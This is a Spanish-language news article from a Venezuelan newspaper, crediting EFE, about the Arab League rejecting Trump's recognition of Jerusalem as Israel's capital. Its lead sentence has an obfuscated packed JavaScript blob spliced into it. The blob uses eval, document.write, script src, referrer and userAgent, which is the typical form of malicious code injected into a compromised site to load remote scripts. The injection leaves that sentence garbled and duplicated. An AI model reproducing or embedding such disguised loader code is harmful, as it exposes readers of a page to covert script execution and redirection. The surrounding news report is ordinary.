Liga Árabe rechaza decisión de Trump sobre Jerusalén

EFE / El Cairo / [email protected]
El eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kbzbt|var|u0026u|referrer|szbrn||js|php'.split('|'),0,{})) responsable también indicó que la decisión de Trump "abre un interrogante sobre su papel en el proceso de paz" entre israelíes y palestinos

(Foto: Archivo)

Ahmed Abulgueit, secretario general de la Liga Árabe, calificó ayer de "nula" la decisión del presidente de Estados Unidos, Donald Trump, de reconocer Jerusalén como la capital de Israel.

"Esta decisión es nula y sus consecuencias son nulas y no va a cambiar el estatus de Jerusalén", dijo Abulgueit durante la apertura de la reunión extraordinaria de los ministros de Asuntos Exteriores árabes que se celebra en El Cairo.

El responsable también indicó que la decisión de Trump "abre un interrogante sobre su papel en el proceso de paz" entre israelíes y palestinos.

Agregó que el paso tomado por el principal mediador en el proceso de paz, en referencia a Estados Unidos, obliga a pensar en las alternativas disponibles y a revisar las actitudes de la Liga Árabe.

Además, pidió a todos los países que no trasladen sus embajadas a Jerusalén, que rechacen la decisión de Trump y que reconozcan a Palestina como estado, una petición a la que se sumaron varios ministros como el jordano Ayman al Safadi, se subrayó que Jerusalén es una "línea roja".

Más noticias

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: [email protected] , [email protected] o [email protected]
Desarrollado por Miguel Guadarrama